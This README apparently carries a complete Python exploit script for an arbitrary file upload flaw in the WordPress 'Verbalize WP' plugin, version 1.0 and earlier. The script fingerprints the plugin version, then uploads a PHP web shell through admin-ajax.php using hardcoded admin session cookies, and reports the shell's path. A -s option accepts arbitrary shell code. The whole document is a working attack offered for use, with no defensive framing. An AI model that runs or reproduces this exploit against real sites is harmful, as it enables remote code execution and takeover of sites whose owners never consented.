README.md
Rendering markdown...
import argparse
import requests
import json
import re
import time
#Exploit By : Nxploit , Khaled Alenazi.
requests.packages.urllib3.disable_warnings()
def check_vulnerability(url):
readme_url = f"{url}/wp-content/plugins/verbalize-wp/readme.txt"
response = requests.get(readme_url, verify=False)
if response.status_code == 200:
match = re.search(r'Stable tag:\s*(\d+\.\d+)', response.text)
if match:
version = float(match.group(1))
if version <= 1.0:
print(f"The site is vulnerable. Exploiting version: {version}. Uploading file...")
return True
print("The site is not vulnerable or readme.txt not found.")
return False
def exploit(url, shell_code):
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0",
"Accept": "application/json, text/javascript, */*; q=0.01",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Referer": f"{url}/wp-admin/admin.php?page=audio-text",
"X-Requested-With": "XMLHttpRequest",
"Content-Type": "multipart/form-data; boundary=---------------------------49212111627065537511229032332",
"Origin": url,
"Connection": "keep-alive",
"Cookie": "wordpress_015fe18cc0e9b211f828d4e47c7733c2=admin%7C1742696436%7CGn8uPLqxYPy06huEfOpU7qZaOx9WBzWjPqB7Pxj2bws%7C18e1fcd93c76fdff695a0bb9acbfad32f47b69a7533d04495fe6da89ac8dcac4; _s_prefix=bdafabda2342343safsafsdfsdfdsfdsf243243243243244d542b31808a0c36a8f2fe15; wp-settings-1=editor%3Dhtml%26libraryContent%3Dbrowse%26urlbutton%3Dnone%26imgsize%3Dlarge; wp-settings-time-1=1742347909; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_015fe18cc0e9b211f828d4e47c7733c2=admin%7C1742696436%7CGn8uPLqxYPy06huEfOpU7qZaOx9WBzWjPqB7Pxj2bws%7Cf0898eb2300a854d486d2ac9d76e00ba1aaee44d75a1f7b022a6afa44f6ebc3f; tk_ai=woo%3AnIv17rVYATsfezT88P9%2B7O0a; woocommerce_items_in_cart=1; woocommerce_cart_hash=cfe46a440bc4000907763cdd0a2e179a; wp_woocommerce_session_015fe18cc0e9b211f828d4e47c7733c2=1%7C%7C1742696522%7C%7C1742692922%7C%7Cefd6a88006636ca7dbdd2e2dbd808894; spbc_is_logged_in=419af1fcb162036919daa55721d72ab9; spbc_admin_logged_in=215be1ca89d93b6f45dd940c712a50c9; spbc_secfw_ip_wl=a8eabeb830e7a3f79b75a17025826bdc; __stripe_mid=5d41584d-13d4-4707-905d-15ff007d594bcf4cba",
"Priority": "u=0"
})
boundary = "---------------------------49212111627065537511229032332"
post_data = [
f'--{boundary}',
'Content-Disposition: form-data; name="action"',
'',
'generate_code',
f'--{boundary}',
'Content-Disposition: form-data; name="theFile"; filename="shell.php"',
'Content-Type: application/x-php',
'',
shell_code,
f'--{boundary}',
'Content-Disposition: form-data; name="num_val"',
'',
'1',
f'--{boundary}',
'Content-Disposition: form-data; name="width"',
'',
'22',
f'--{boundary}',
'Content-Disposition: form-data; name="height"',
'',
'22',
f'--{boundary}',
'Content-Disposition: form-data; name="btn_val"',
'',
'speaker',
f'--{boundary}',
'Content-Disposition: form-data; name="btn_color"',
'',
'red',
f'--{boundary}--',
''
]
data = '\r\n'.join(post_data)
response = session.post(f"{url}/wp-admin/admin-ajax.php", data=data, verify=False)
response_json = json.loads(response.text)
html_content = response_json.get('html', '')
id_match = re.search(r'id="(\d+)"', html_content)
audio_match = re.search(r'audio="([^"]+)"', html_content)
if id_match and audio_match:
shell_id = id_match.group(1)
shell_name = audio_match.group(1)
shell_path = f"/wp-content/uploads/audio-text/{shell_id}/{shell_name}"
print(f"Shell path: {shell_path}")
else:
print("Failed to extract shell path")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="WordPress Verbalize WP plugin <= 1.0 - Arbitrary File Upload vulnerability #By: Nxploited ,Khaled Alenazi,")
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-s', '--shell', default="<?php phpinfo(); ?>", help='Shell code to upload')
args = parser.parse_args()
if check_vulnerability(args.url):
time.sleep(3)
exploit(args.url, args.shell)
print("Exploit By: Nxploit, Khaled ALenazi")